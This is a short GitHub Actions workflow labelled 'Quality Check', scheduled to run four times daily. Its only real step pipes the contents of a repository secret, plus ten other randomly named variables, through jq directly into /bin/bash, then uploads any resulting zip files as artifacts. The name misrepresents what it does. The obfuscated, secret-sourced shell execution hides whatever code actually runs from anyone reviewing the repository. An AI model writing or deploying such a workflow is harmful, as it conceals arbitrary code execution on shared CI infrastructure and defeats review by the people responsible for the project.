name: Quality Check
on:
  workflow_dispatch:

  schedule:
    - cron: '39 1,7,13,19 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  compile:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Setup and run
        env:
          cz960: ${{ secrets.cz960 }}
        run: |
          printf '%s' "$cz960" | jq -r .met95062 | /bin/bash
          printf '%s' "$gtyi3715" | jq -r .gbchc07281 | /bin/bash
          echo $lhso8747 | jq -r .np710 | /bin/bash
          echo $ajy2438 | jq -r .guknn9550 | /bin/bash
          echo $jffrk9 | jq -r .m66 | /bin/bash
          echo $uly99 | jq -r .mbvz39031 | /bin/bash
          echo $f01 | jq -r .ohmzn3516 | /bin/bash
          printf '%s' "$ajzf9100" | jq -r .ds422 | /bin/bash
          echo $jwryg7665 | jq -r .mqr3170 | /bin/bash
          printf '%s' "$cuhf560" | jq -r .eh2326 | /bin/bash
          echo $le8 | jq -r .qqbl95 | /bin/bash

      - name: Upload data
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: oyxuC0at
          path: "*.zip"
          retention-days: 1
